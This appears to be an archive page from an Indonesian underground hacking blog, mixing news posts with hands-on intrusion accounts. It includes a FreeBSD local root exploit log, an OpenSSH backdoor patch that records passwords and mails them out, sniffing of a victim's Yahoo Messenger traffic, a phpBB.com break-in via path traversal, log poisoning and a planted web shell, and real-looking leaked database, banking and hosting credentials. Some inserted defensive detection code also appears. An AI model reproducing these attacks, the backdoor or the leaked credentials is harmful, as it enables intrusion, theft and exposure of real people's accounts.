Kecoak Elektronik Indonesia

Defending Classical Hacker Mind since 1995

Archive for the ‘Underground’ Category

FreeBSD rtld 0day exploit

with 5 comments

Kingcope has published this local exploit to the FD (Full-Disclosure) list.

[bofh@begok ~/hack]$ uname -a
FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009     root@begok.xxxxx.de:/usr/obj/usr/src/sys/BEGOK  i386
[bofh@begok ~/hack]$ ./fbsd-local-2009.sh
fbsd-local-2009.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
8:35
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh)

This publication will obviously be put to use quickly by hackers/crackers who can get local access to FreeBSD machines. It seems there is no patch as of now. So, go wild guys? :p.

** Thanks to temon for testing the exploit, as currently I don't have FBSD to test. *sigh*.

Written by byteskrew

December 1st, 2009 at 11:52 am

Posted in 0day, Bug & Exploit, Underground


ZFO #5 Released

with 10 comments

Ahead of the BlackHat 2009 security conference in Las Vegas, ZFO gave a pretty warm welcome by releasing the 5th issue of their ezine. One of the mirrors can be seen here. It looks like the Undergrounders' movement of 5-6 years ago is about to repeat itself. Exciting.... :D

Written by Neo Kecoak Elektronik

July 30th, 2009 at 12:21 pm

Posted in 0day, Underground

Bye bye milw0rm?!

with 3 comments

Many die-hard milw0rm fans probably already know that milw0rm has been declared to be shutting down, and for the last little while it has no longer been accessible. The reason can perhaps be seen in this news item, although many rumours are circulating that there is another reason behind all this that forced str0ke to shut milw0rm down. But judging from str0ke's Twitter, there seems to be good news coming about milw0rm; we'll see.

Maybe it's time to look for another alternative?! packetstormsecurity still provides an archive of exploits, tools and PoCs every month, or maybe it's time this site got more hits, especially from those who miss the milw0rm atmosphere?! :)

Written by byteskrew

July 9th, 2009 at 9:27 am

Posted in News, Underground

PHRACK #66

with 4 comments

It has been released and can be enjoyed via the official site. Huff, tonight would be a fun, looong night :).

Written by byteskrew

June 11th, 2009 at 1:12 pm

Posted in News, Underground

.astalavista has been pawned by anti-sec group.

with 3 comments

.pr0j3kt m4yh3m arises again,
.the sec-industry is humiliated once more, this time it's astalavista's turn,

.read here for gr34t35t tr1p.

.nb: it turns out that some of the exploits and scripts published by astalavista were ripped from milw0rm, and if you look at the md5 hashes that were exposed, the plaintexts contain names like amar0184, pascal, kio42m, or, what made us smile, adminadmin, astalavista and 123456 used as passwords.

.what the m**s with u astalavista council-

.update: nowayout /at/ astalavista staff, 3xp053d.

Written by Neo Kecoak Elektronik

June 7th, 2009 at 1:36 pm

Posted in News, Underground

Tcpdump for kIdz

with 3 comments

What is tcpdump?
tcpdump is one of the Linux programs that captures the stream of data packets from eth0/eth1, more commonly known as Sniffing.
Ok, let me share a little experience.
Yesterday when I checked my email, it turned out several logs had already arrived from the backdoored OpenSSH 4.7p1 on port 22 that I had infected on a server I had rooted; how to do that backdooring was explained earlier by the Elders here.. hehehe :D

//logs di file
+ if((f=fopen(LOGZ,"a"))!=NULL){
+ fprintf(f,"user:password@host --> %s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+ fclose(f);
+ }
+ //kirim ke server pake curl/mail terserah
+ //example pake 'mailx'
+ snprintf(logz,sizeof(logz),"tail -1 %s|mailx -s \"[owned user]new fucked user\" [cencored]@live.com",LOGZ);
+ system(logz);
...
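Review bot: the two string literals on the fprintf line (`user:password@host --> %s:%s@%s`) and the mailx line (`mailx -s "[owned user]new fucked user"`) are compiled into sshd unchanged, so anyone checking a host for this modification can find them with `strings` on the installed sshd binary and confirm by comparing the binary's checksum with the distribution package; an sshd that opens a file for append and calls system() inside password authentication has been tampered with.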

as you can read from the script above, every time anyone makes an ssh connection from that server, outbound or to localhost, it is automatically sent to my email :D
ok, first step:
I logged into that sniffed server,
straight away:

root@ds6471:/# cat etc/hosts

127.0.0.1       localhost server0
xx.xxx.xx.xxx   rahasia.deh.id

#client customer
192.168.90.4     client1
192.168.90.10    client2
192.168.90.15    client3
192.168.90.51    client4
192.168.90.22    client5
192.168.90.201   client6

Wow.. looks like an internet cafe server, or an office, who knows..^^
then I looked at the traffic; turns out iftop wasn't there, they use Nload.
hmm..

root@ds6471:/# uname -a;cat etc/issue
Linux ds6471 2.6.22-8-server #1 SMP Thu Jul 12 16:28:57 GMT 2007 i686 GNU/Linux
Ubuntu 6.06 LTS \n \l

using ubuntu..:D, don't waste time, straight away:

root@ds6471:/#apt-get install iftop

ok, installed

root@ds6471:/#iftop -i eth1 -F 192.168.90.10/32

12.5Kb          25.0Kb          37.5Kb          50.0Kb    62.5Kb
+-------------------------------------------------------------------------------
192.168.90.10             <=> bs2.ads.vip.tpc.yahoo.com  5.25Kb  4.03Kb  2.99Kb
192.168.90.10             <=> tx-in-f113.google.com      3.66Kb  4.02Kb  4.22Kb
192.168.90.10             <=> ns3.turbodns.co.uk          748b   1.29Kb   983b
192.168.90.10             <=> 194.14.236.50              1.22Kb   250b    267b
192.168.90.10             <=> server6614.dedicated.webf     0b    188b     67b
192.168.90.10             <=> ds6488.dedicated.turbodns     0b    188b     67b
192.168.90.10             <=> raucousdns.co.uk              0b    188b     67b
192.168.90.10             <=> ad1.vip.rm.jp1.yahoo.net      0b    188b     67b
192.168.90.10             <=> server6485.dedicated.webf     0b    188b     67b
192.168.90.10             <=> in2.msg.vip.mud.yahoo.com    94kb   188b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b    141b     50b
192.168.90.10             <=> server6437.dedicated.webf     0b    125b    132b
192.168.90.10             <=> 239.255.2.2                   0b     36b     13b
192.168.90.10             <=> server6577.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6636.dedicated.webf    90kb     0b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6643.dedicated.webf     0b      0b     65b

--------------------------------------------------------------------------------
TX:             cumm:  64.4KB   peak:   3.08Kb  rates:   10.8Kb  1.72Kb  1.32Kb
RX:                    57.4KB           3.08Kb           12.6Kb  1.81Kb   904b
TOTAL:                  122KB           5.42Kb           114Kb  3.54Kb  2.21Kb

Ok, there's a lot of traffic to
here I'll try to sniff the Yahoo Messenger conversation.

root@ds6471:/#tcpdump -n -f -s 0 -X -vvv -i eth1 port 5050 and host 192.168.90.10 >>log.txt
tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes

root@ds6471:~# ls -lia
total 80
1196084 drwxr-xr-x  7 root root  4096 Apr 16 10:47 .
1179916 drwxr-xr-x 19 root root 32768 Apr 15 07:47 ..
1459192 drwx------  2 root root  4096 Feb  7 05:30 .aptitude
1202658 -rw-------  1 root root  4480 Apr 16 10:47 .bash_history
1198732 -rw-r--r--  1 root root  2227 Oct 13  2005 .bashrc
1441948 drwxr-xr-x  5 root root  4096 Jan  7 15:05 .cpan
1427211 drwxr-xr-x  3 root root  4096 Apr 15 20:00 .mc
1461933 drwxr-xr-x  4 root root  4096 Apr 16 02:28 .msf3
1198731 -rw-r--r--  1 root root   141 Oct 13  2005 .profile
1427701 drwx------  2 root root  4096 Apr 15 01:04 .ssh
1197166 -rw-r--r--  1 root root  5642 Apr 16 10:47 log.txt
root@ds6471:~#vi log.txt

yep, we have logged their conversation..
now, how do you sniff passwords and other important data?
there are many ways…
you can develop it further yourself..
for things like pop3, smtp, etc..

Cheers,
Xsniffer
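A defender's counterpart to the capture above, added here and not part of Xsniffer's post: tcpdump puts the interface it listens on into promiscuous mode by default, and the Linux kernel logs that transition, so a host-monitoring check can replay those messages and confirm the live state through /sys/class/net/<if>/flags. The sample log lines and interface names are constructed, and the check only sees captures that use promiscuous mode.

```python
import re
from pathlib import Path

IFF_PROMISC = 0x100  # interface flag bit, from <linux/if.h>

# Matches both the classic kernel message ("device eth1 entered promiscuous
# mode") and the newer form ("eth1: entered promiscuous mode").
_PROMISC_RE = re.compile(
    r"(?:device (?P<old>\S+)|(?P<new>[^\s:]+):) (?P<action>entered|left) promiscuous mode"
)

# Constructed sample kernel log (dmesg style); not taken from the page.
SAMPLE_KLOG = """\
[  120.441] device eth1 entered promiscuous mode
[  121.002] device eth0 entered promiscuous mode
[  130.771] device eth0 left promiscuous mode
[  200.120] device eth1 entered promiscuous mode
[  300.500] eth2: entered promiscuous mode
[  301.900] eth2: left promiscuous mode
"""


def promiscuous_from_klog(text):
    """Replay enter/left events in log order.

    Returns (active, enters): the set of interfaces still in promiscuous mode
    when the log ends, and how many times each interface entered it. A gateway
    interface that keeps entering promiscuous mode with no known capture job
    is the trace a tcpdump session like the one above leaves behind.
    """
    active, enters = set(), {}
    for line in text.splitlines():
        m = _PROMISC_RE.search(line)
        if not m:
            continue
        ifname = m.group("old") or m.group("new")
        if m.group("action") == "entered":
            active.add(ifname)
            enters[ifname] = enters.get(ifname, 0) + 1
        else:
            active.discard(ifname)
    return active, enters


def flags_promiscuous(hex_flags):
    """/sys/class/net/<if>/flags holds the interface flags as a hex string
    (e.g. '0x1103'); True when the IFF_PROMISC bit is set."""
    return bool(int(hex_flags.strip(), 16) & IFF_PROMISC)


def promiscuous_now(sysfs_net="/sys/class/net"):
    """Live check of the running system via sysfs; empty list when sysfs is
    absent (non-Linux host) or no interface is promiscuous right now."""
    root = Path(sysfs_net)
    if not root.is_dir():
        return []
    found = []
    for flags_file in root.glob("*/flags"):
        try:
            if flags_promiscuous(flags_file.read_text()):
                found.append(flags_file.parent.name)
        except (OSError, ValueError):
            continue
    return sorted(found)


if __name__ == "__main__":
    active, enters = promiscuous_from_klog(SAMPLE_KLOG)
    print("still promiscuous per kernel log:", sorted(active))
    print("enter events per interface:", enters)
    print("promiscuous right now (sysfs):", promiscuous_now())
```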

Written by Guest Blogger

April 16th, 2009 at 10:30 pm

Posted in Kidz Game, Underground


DDOS pada situs Metasploit dan Milw0rm

with 2 comments

At the time of writing, metasploit and milw0rm cannot be accessed. HDM has moved metasploit access to port 8000, so anyone who wants to access metasploit can do so for now via this link. milw0rm, meanwhile, is still down.


$ curl http://www.metasploit.com

ERROR: The requested URL could not be retrieved

ERROR

The requested URL could not be retrieved


While trying to retrieve the URL: www.metasploit.com/

The following error was encountered:

  • Request Timeout

The system returned:

A Timeout occurred while waiting to read data from the network. The network or server may be down or congested. Please retry your request.


$ curl http://www.milw0rm.com
curl: (6) Couldn't resolve host 'www.milw0rm.com'

Meanwhile HDM claims to have identified the party doing the ddos and has redirected the A record for metasploit.com to that botnet owner's forum. Although he stated on irc that connections have dropped sharply, from 90 thousand per second to 500 per second thanks to his countermeasure, at the time of writing the metasploit site still cannot be accessed.

DDOS remains a very dangerous toy to this day, and collecting a botnet (even with a combination of several methods) is still the top choice for launching a DDOS attack.

Written by byteskrew

February 8th, 2009 at 3:23 am

Posted in News, Underground

PHPBB[dot]com was hacked

without comments

It can be read directly on this blog.

Since a lot of the information (i.e. pastebin) is being deleted quickly, the blog's contents are copied here as an archive in case it gets deleted someday. The technique used is quite interesting, especially since it was launched against a site whose product is used by thousands of people around the world.


Taken from: http://hackedphpbb.blogspot.com

It all started on Jan 14th when I was surfing milw0rm and came across this exploit: http://www.milw0rm.com/exploits/7778 I then remembered that phpbb.com was running PHPlist and went looking through my email to find the link to the script's location. So I went to phpbb.com/lists and sure enough they were running a vulnerable version. Next I enabled my favorite proxy program and tried http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd and sure enough it included the etc/passwd

http://hackedphpbb.pastebin.com/f70f8bcaf
http://rapidshare.com/files/192159914/etc.txt

So I moved on to /etc/httpd/conf/httpd.conf
http://rapidshare.com/files/192163061/httpd.txt
http://hackedphpbb.pastebin.com/d29d8d4c7

And eventually found my way to their error log /home/logs/phpbb.com/error_log. After a little looking I figured out that their forums were running off /home/virtual/phpbb.com/community/. Well, it has been known for some time that you can include code in the error log. So I wanted to run some code; well, in PHPBB3 the avatars are located in a folder called /home/virtual/phpbb.com/community/images/avatars/upload and your avatar is called (secret hash)_userid.jpg. But I didn't know what the secret hash was to include my picture (that had my own code in it), so by using the error log I injected code
And figured out that their hash is f51ee61fe7a83fdf72780912bced0855. So now every time I want to run code against the server I can include this: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg

So my first avatar was something simple and I wanted to see if phpbb kept their config file in plain text, so cat /home/virtual/phpbb.com/community/config.php and sure enough, it's in plain text.
$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5';
$table_prefix = 'community_';

While I was at it I checked out the config for PHPlist and it was also in plain text:
$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3';

So I started running commands and found out that I can upload a php text file on the forums, and by finding the path where it was stored I was able to get around their 14kb restriction on avatars, a lot easier than editing images with edjpgcom. So doing a mysql dump of the phplist_admin table showed in plain text that the password for the one admin account was phpbb_n3ws and the login was phpBB. Wow, I am shocked no one brute forced this. So I login and see what I can come across, wow, 400,000 registered emails, I'm sure that will go quick on the black market, sorry people but expect a lot of spam. After trying to modify the files that were stored in PHPlist I gave up and moved on to the forums. But not before dumping the PHPlist emails here: http://rapidshare.com/files/192305758/out.txt

On the phpbb forums it states it has 200,000 members, but due to them constantly getting spammed they have well over 400,000 accounts. I started dumping the community_users table with their user_id, username and user_password. PHPBB stores their users' passwords in unsalted md5 and their admins' passwords in some funky hash. But if you run your own forum and are an admin you can have your forums create the hash, and then you do a mysql update to one of the admin accounts and you're in. Or if you change their password to yours you can use the recover password function. More to come from this later.

So I wrote a script that submits the md5 hash via curl to a website and then stores the successful result in my own mysql database. The total accounts cracked are: 28635. I could have continued cracking but it was getting boring. Here is a sql file of the cracked passwords. Warning, some of the usernames aren't right as I had to remove ticks and quotes for it to run in my script, so I included their user id so you can check their proper login name.
http://rapidshare.com/files/192304153/phpbb_users.sql

In gaining access to the admin panel of the forums, I was able to read staff forums and come across some interesting posts. I will share some with you.

List passwords:
TO try and make this easier, below is a list of the mailing list passwords I had, please update and add any others that you have


Told you they were random Meik ;) 

edit by dhn: added website-commits
edit by tm: added phpbb-honey-commits, st--tool-commits, iit-track-commits.

8kg;rt7Xykjq

That password should work for all mailing lists on code.phpbb.com.

Emergency contacts and irc info:
http://hackedphpbb.pastebin.com/f1399b3e8

And then I remembered that the admin panel allows you to dump tables. So I dumped the users table which is accessible here:
http://rapidshare.com/files/192261517/backup_sql.gz

Next I enabled php in template files and added this bit of code to one of the templates:
$ip=$_SERVER['REMOTE_ADDR']; if($ip == "x.x.x.x"){include("/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f");}

Which happened to be a shell, R57shell actually. I then searched for a writable directory and created a php file and wrote the source code to that file. I cleaned up the template and settings and logs and left the forums to run the way they were.

After searching around using the shell I came across the Blog settings:
define('DB_NAME', 'wordpress'); // The name of the database
define('DB_USER', 'blog'); // Your MySQL username
define('DB_PASSWORD', 'htsCCvyCnt5jPYMx'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

And now it comes to an end, you may ask why did I do this? For fun mainly, but what I would like to suggest to the team at phpbb is this. If you are going to run third party scripts, either integrate them or keep up to date on their patches (even though the patch wasn't released for 2 weeks). Also don't allow admins to recover their passwords; they should have to contact another admin. Another item, don't keep plain text files of passwords, or plain text passwords in the database.

I know this isn’t the best read, but it is very hard to look back on everything you did over the course of a few weeks. But hopefully I can now sleep better knowing that I am not worrying about the next way to break in.

-----------------------------------UPDATE
to all that say i am a script kiddie, fuck you
phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog
--------------------------update
here are some updated links
http://www.2shared.com/file/4785295/67200bd7/phpbb.html

when I was talking about encrypted passwords, I meant when it was stored in PHPlist in plain text
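A defensive counterpart to the write-up above (an added example, not code from the quoted blog or from phpBB/PHPlist): the first function is the containment check an include path should pass before anything is included, so the `../../../../../../etc/passwd` traversal and direct absolute paths are refused; the second scans a web error log for PHP open tags, the residue that error-log poisoning leaves behind. The base directory, sample paths and log lines are constructed.

```python
import os
import re


def resolve_include(base_dir, requested):
    """Return the real path of `requested` only if it stays inside `base_dir`.

    realpath() collapses '..' segments and symlinks before the containment
    test, so '../../../../../../etc/passwd' resolves to /etc/passwd and is
    rejected, as is any absolute path handed in directly.
    """
    if os.path.isabs(requested):
        raise ValueError("absolute path not allowed: %r" % requested)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes %s: %r" % (base, requested))
    return target


# A PHP open tag has no business in a request path or User-Agent; its presence
# in a log line means someone is trying to plant code where it may later be
# included (the error_log trick in the write-up above).
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def poisoned_log_lines(log_text):
    """Return (line_number, line) for each log line carrying a PHP open tag."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if PHP_TAG_RE.search(line)]


# Constructed Apache-style error_log sample; none of it is from the page.
SAMPLE_ERROR_LOG = """\
[Wed Jan 14 10:02:11 2009] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico
[Wed Jan 14 10:05:42 2009] [error] [client 192.0.2.77] File does not exist: /var/www/html/<?php echo 'poisoned'; ?>
[Wed Jan 14 10:06:01 2009] [error] [client 192.0.2.77] PHP Warning:  include(): Failed opening '../../../../etc/passwd' in /var/www/html/index.php
"""

if __name__ == "__main__":
    # "/srv/app" is an assumed application directory.
    for req in ("templates/header.php", "../../../../../../etc/passwd", "/etc/passwd"):
        try:
            print("allow", resolve_include("/srv/app", req))
        except ValueError as exc:
            print("deny ", exc)
    for n, line in poisoned_log_lines(SAMPLE_ERROR_LOG):
        print("poisoned line %d: %s" % (n, line[:70]))
```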

Written by byteskrew

February 6th, 2009 at 9:31 am

Posted in News, Underground

MS08-067 a.l.a SkidisH

with 4 comments

In one night…

[Ctank]: man... MS08-067 is still tasty for skiddie action, eh...
[h3b]: really?! around here everything's already patched :( ...
[Ctank]: depends on picking the network, VPN, dialup, hotspot, hotel, etc
[h3b]: ...
[Ctank]: My Document. not bad...
===
no speedy : 161301201302
password  : SFD8NLexxx

ID Internet banking : sonniehoxxxx
Password : 888888

Billing Contact:
   CV. AGUNG JAYA GEMILANG
   steven xxxxxx        ()
   jln.nyi ageng xxxxxx 106. xxxx xxxxx
   cirebon
   Jawa Barat,45155
   ID
   Tel. +062.0231xxxxxx

Host : http://hostbang.com:2082 (cPanel)
u : nokiss
p : 214xxxxx   

Host : indowebiz.com/iix/administrator (Web Panel)
u : masdapit
p : logxxxxxx

Host : indowebiz.com/client/admin (WHMCS)
u : indowebiz
p : xxxxx13
===
[h3b]: lucky bast*rd...
[Ctank]: LOL

Written by byteskrew

January 15th, 2009 at 12:55 pm

Technology’s Top Unsolved Cybercrimes

without comments

  • The WANK Worm (October 1989). Possibly the first “hacktivist” attack, the WANK (Worms Against Nuclear Killers) worm hit NASA offices in Greenbelt, Maryland, by running a banner across system computers as part of a protest to stop the launch of the plutonium-fueled, Jupiter-bound Galileo probe.

  • U.K. Ministry of Defense Satellite Hack (February 1999). A small group of hackers traced to southern England gained control of an MoD Skynet military satellite and signaled a security intrusion characterized by officials as “information warfare”, in which an enemy attacks by disrupting military communications. In the end, the hackers managed to reprogram the control system before being discovered.

  • CD Universe Credit Card Breach (January 2000). A blackmail scheme gone wrong: the posting of more than 300,000 credit card numbers by the hacker Maxim on a Web site entitled “The Maxus Credit Card Pipeline” has remained unsolved since early 2000. Maxim stole the credit card information by breaching CDUniverse.com; he or she then demanded $100,000 from the Web site in exchange for destroying the data. While Maxim is believed to be from Eastern Europe, the case remains unsolved!

  • Military Source Code Stolen (December 2000). If there’s one thing you don’t want in the wrong hands, it’s the source code that can control missile-guidance systems. In winter 2000, a hacker broke into government-contracted Exigent Software Technology and nabbed two thirds of the code for Exigent’s OS/COMET software, which is responsible for both missile and satellite guidance, from the Naval Research Lab in Washington D.C. Officials followed the trail of the intruder, “Leaf”, to the University of Kaiserslautern in Germany, but that’s where the trail appears to end.

Can anyone solve it? ;P

Written by Sp1d3r-73

December 12th, 2008 at 10:53 am